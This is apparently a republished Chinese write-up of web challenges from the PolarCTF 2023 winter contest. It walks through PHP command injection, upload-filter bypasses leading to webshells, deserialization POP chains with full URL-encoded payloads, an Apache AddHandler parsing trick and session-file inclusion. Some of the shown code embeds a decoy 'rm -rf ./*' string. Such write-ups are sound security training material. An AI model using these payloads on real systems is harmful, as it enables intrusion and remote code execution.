本文主要是介绍PolarCTF网络安全2023冬季个人挑战赛 WEB方向题解 WriteUp,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
完工,最后CB链没时间打了,估计也不怎么打得出来,今天一边在打polar一边弄服务外包赛,好累呜呜呜。
Polar 冬 干正则(WEB)
直接给了源码
parse_str():将字符串解析成多个变量
payload:
?id=a[]=www.polarctf.com&cmd=;cat%20flag*
Polar 冬 upload(WEB)
开题
源码里面发现hint
得到源码如下:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {if (file_exists(UPLOAD_PATH)) {$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");$file_name = trim($_FILES['upload_file']['name']);$file_name = str_ireplace($deny_ext,"", $file_name);$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = UPLOAD_PATH.'/'.rand(10000,99999).$file_name; if (move_uploaded_file($temp_file, $img_path)) {$is_upload = true;} else {$msg = '上传出错!';}} else {$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';}
}
str_ireplace():替换字符串中的一些字符(不区分大小写)。双写即可绕过。
直接getshell就行。
Polar 冬 cookie欺骗(WEB)
伪造一下Cookie就行
Polar 冬 随机值(WEB)
直接给了源码
要满足两个随机值,可以暴力爆破,发包10000次应该够了。我们按题目预期来,使用变量引用来做这题。
PHP7,类型不敏感,类中属性可以全换为public。
秒了。
EXP:
<?php
class Index{public $Polar1;public $Polar2;public $Night;public $Light;function getflag($flag){$Polar2 = rand(0,100);if($this->Polar1 === $this->Polar2){$Light = rand(0,100);if($this->Night === $this->Light){echo $flag;}}else{echo "Your wrong!!!";}}
}$a=new Index();
$a->Polar1=&$a->Polar2;
$a->Night=&$a->Light;echo serialize($a);
Polar 冬 你想逃也逃不掉(WEB)
直接给了源码
反序列化之字符串逃逸。
EXP:
<?php
function filter($string){return preg_replace( '/phtml|php3|php4|php5|aspx|gif/','', $string);
}
$user['username'] = 'phtmlphtmlphtmlphtml';
$user['passwd'] = ';s:6:"passwd";s:0:"";s:4:"sign";s:6:"ytyyds";}';
$user['sign'] = '123456';
#a:3:{s:8:"username";s:5:"Jay17";s:6:"passwd";s:0:"";s:4:"sign";s:6:"123456";}echo serialize($user);//初始
echo "\n";
echo filter(serialize($user));//过滤字符后$ans = filter(serialize($user));
if(unserialize($ans)[sign] == "ytyyds"){echo "\nJay17";
}
payload:
GET:?passwd=%3Bs%3A6%3A%22passwd%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22sign%22%3Bs%3A6%3A%22ytyyds%22%3B%7DPOST:name=phtmlphtmlphtmlphtml
Polar 冬 ezphp(WEB)
开题,爬虫相关,想到robots.txt文件
访问robots.txt,获得三个路由
/uploads/upload.php:文件上传功能
/file/file.php:文件包含功能
文件包含读取upload.php文件内容:
<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>File Upload</title>
</head>
<body><?php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {// 检查文件是否上传成功if (isset($_FILES['file']) && $_FILES['file']['error'] === UPLOAD_ERR_OK) {// 定义允许上传的文件类型$allowed_extensions = array("jpg", "jpeg", "png", "gif");// 获取上传文件的文件名和扩展名$filename = $_FILES['file']['name'];$file_extension = pathinfo($filename, PATHINFO_EXTENSION);// 检查文件扩展名是否在允许的列表中if (in_array(strtolower($file_extension), $allowed_extensions)) {// 确定存储上传文件的目录$upload_directory = './images/';// 确保目录存在,如果不存在则创建if (!is_dir($upload_directory)) {mkdir($upload_directory, 0777, true);}// 构造上传文件的完整路径$upload_path = $upload_directory . $filename;// 移动文件到指定目录if (move_uploaded_file($_FILES['file']['tmp_name'], $upload_path)) {echo '<p>文件上传成功!</p>';} else {echo '<p>文件上传失败。</p>';}} else {echo '<p>不允许上传该类型的文件。</p>';}} else {echo '<p>文件上传失败。</p>';}
}
?><form action="" method="post" enctype="multipart/form-data"><label for="file">选择文件:</label><input type="file" name="file" id="file" accept=".jpg, .jpeg, .png, .gif" required><br><input type="submit" value="上传文件">
</form></body>
</html>
文件后缀是白名单,难绕过,一般白名单的文件上传都是要结合其他漏洞。有文件包含,那就结合文件包含。
有文件包含,所以后缀不用管,包含文件内容,就算jpg都能把马包含进来。
直接包含
看源码,目录是,/uploads/images/xxx.xxx。
/file/file.php 文件包含getshell。
Polar 冬 你的马呢?(WEB)
开题:(注意URL,可能会存在文件包含)
还真存在文件包含
upload.php
<?phpif(isset($_FILES['upfile'])){$uploaddir = 'uploads/';$uploadfile = $uploaddir . basename($_FILES['upfile']['name']);$ext = pathinfo($_FILES['upfile']['name'],PATHINFO_EXTENSION);//检查文件内容$text = file_get_contents($_FILES['upfile']['tmp_name']);echo $ext;//检查文件后缀if (!preg_match("/ph.|htaccess/i", $ext)){if(preg_match("/<\?php/i", $text)){echo "嘿嘿嘿,想传马?不可能!<br>";}else{move_uploaded_file($_FILES['upfile']['tmp_name'],$uploadfile);echo "恭喜你,上传路径<br>路径为:" . $uploadfile . "<br>";}} else {echo "恶意后缀,试试.jsp呢?<br>";}}
?><!DOCTYPE html>
<html>
<head><title>上传文件</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</head>
<body>千万别上传php脚本!!!!<form action="upload.php" method="POST" enctype="multipart/form-data"><input type="file" name="upfile" value="" /><input type="submit" name="submit" value="提交" /></form>
</body>
</html>
文件上传功能过滤php、htaccess后缀,过滤文件内容<?php。看似山穷水尽,仔细一看发现存在apache解析漏洞。
AddHandler导致的Apache解析漏洞
如果服务器给.php后缀添加了处理器:
AddHandler application/x-httpd-php.php那么,在有多个后缀的情况下,只要包含.php后缀的文件就会被识别出php文件进行解析,不需要是最后一个后缀。如shell.php.jpg中包含.php,所以解析为php文件
利用:
1、1.php.jpg
2、1.php.txt
影响范围:2.4.0-2.4.29版本
getsgell
Polar 冬 苦海(WEB)【】
反序列化+文件包含,难的是找flag。
链子如下:
User::__wakeup()->User::printName()->Surrender::__toString()->FileRobot::__get()->FileRobot::__invoke()->FileRobot::Get_file()
给个EXP:
删库跑路,蹲监狱~ <?php
/*
PolarD&N CTF
*/
error_reporting(1);class User
{public $name = 'PolarNight';public $flag = 'syst3m("rm -rf ./*");';public function __construct(){echo "删库跑路,蹲监狱~";}public function printName(){echo $this->name;return 'ok';}public function __wakeup(){echo "hi, Welcome to Polar D&N ~ ";$this->printName();}public function __get($cc){echo "give you flag : " . $this->flag;}
}class Surrender
{private $phone = 110;public $promise = '遵纪守法,好公民~';public function __construct(){$this->promise = '苦海无涯,回头是岸!';return $this->promise;}public function __toString(){return $this->file['filename']->content['title'];}
}class FileRobot
{public $filename = 'flag.php';public $path;public function __get($name){$function = $this->path;return $function();}public function Get_file($file){$hint = base64_encode(file_get_contents($file));echo $hint;}public function __invoke(){$content = $this->Get_file($this->filename);echo $content;}
}//User::__wakeup()->User::printName()->Surrender::__toString()->FileRobot::__get()->FileRobot::__invoke()->FileRobot::Get_file()$a=new User();
$a->name=new Surrender();
$a->name->file['filename']=new FileRobot();
$a->name->content['title']='bucunzai';
$a->name->file['filename']->path=new FileRobot();
$a->name->file['filename']->path->filename='../flag.php';echo urlencode(serialize($a));//unserialize(serialize($a));
payload:
?user=O%3A4%3A%22User%22%3A2%3A%7Bs%3A4%3A%22name%22%3BO%3A9%3A%22Surrender%22%3A4%3A%7Bs%3A16%3A%22%00Surrender%00phone%22%3Bi%3A110%3Bs%3A7%3A%22promise%22%3Bs%3A30%3A%22%E8%8B%A6%E6%B5%B7%E6%97%A0%E6%B6%AF%EF%BC%8C%E5%9B%9E%E5%A4%B4%E6%98%AF%E5%B2%B8%EF%BC%81%22%3Bs%3A4%3A%22file%22%3Ba%3A1%3A%7Bs%3A8%3A%22filename%22%3BO%3A9%3A%22FileRobot%22%3A2%3A%7Bs%3A8%3A%22filename%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A4%3A%22path%22%3BO%3A9%3A%22FileRobot%22%3A2%3A%7Bs%3A8%3A%22filename%22%3Bs%3A11%3A%22..%2Fflag.php%22%3Bs%3A4%3A%22path%22%3BN%3B%7D%7D%7Ds%3A7%3A%22content%22%3Ba%3A1%3A%7Bs%3A5%3A%22title%22%3Bs%3A8%3A%22bucunzai%22%3B%7D%7Ds%3A4%3A%22flag%22%3Bs%3A21%3A%22syst3m%28%22rm+-rf+.%2F%2A%22%29%3B%22%3B%7D
Polar 冬 safe_include(WEB)
直接给了源码:
open_basedir:限制PHP访问文件的目录(读写),不限制命令执行的目录。
这里开启了session,我们可以使用session文件包含,而且session文件不会被清理。我们可以利用他来getshell。
在PHP中,使用$_SESSION[]可以存储特定用户的Session信息。并且每个用户的Session信息都是不同的。
当用户请求网站中任意一个页面时,若用户未建立Session对象,则服务器会自动为用户创建一个Session对象,它包含唯一的sessionID和其他Session变量,并保存在服务器内存中,不同用户的Session对象存着各自指定的信息。
利用Session变量存储信息:
$_SESSION[“sessionID”]=变量或字符串信息;
读取Session变量信息(可赋值给一个变量或者直接输出):
变量=$_SESSION[“sessionID”];
sessionID可以自己创造一个,比如jayjay。那么session文件名就是/tmp/sess_jayjay,里面存储了sessionID为jayjay的session变量信息。sessionID一般就是Cookie中PHPSESSID的值。当用户在Cookie中设置PHPSESSID=jayjay时,PHP就会生成一个文件/tmp/sess_jayjay,此时也就初始化了session。同时,这时候传参,参数值就自动被写入/tmp/sess_jayjay了。
这里我们可以读取Session变量信息,也可以存储Session变量信息,那我们就可以往里面放🐎,然后包含🐎,getshell。
存马到sess_Jay17文件。
包含sess_Jay17文件也就是包含马,getshell。
Polar 冬 phpurl(WEB)
附件:
在某次渗透测试中,红队使用网站目录探测工具发现网站源码泄漏,该文件名疑似名被加密:aW5kZXgucGhwcw。
aW5kZXgucGhwcwbase64解码后是index.phps
开题
访问/index.phps路由。直接给了源码
很简单,xxs二次URL编码就行。
注意点:/index.phps只是源码泄露,传参在/路由。
Polar 冬 cool(WEB)
开题,直接给了源码
payload:
?a=echo `cat f*`;
这篇关于PolarCTF网络安全2023冬季个人挑战赛 WEB方向题解 WriteUp的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
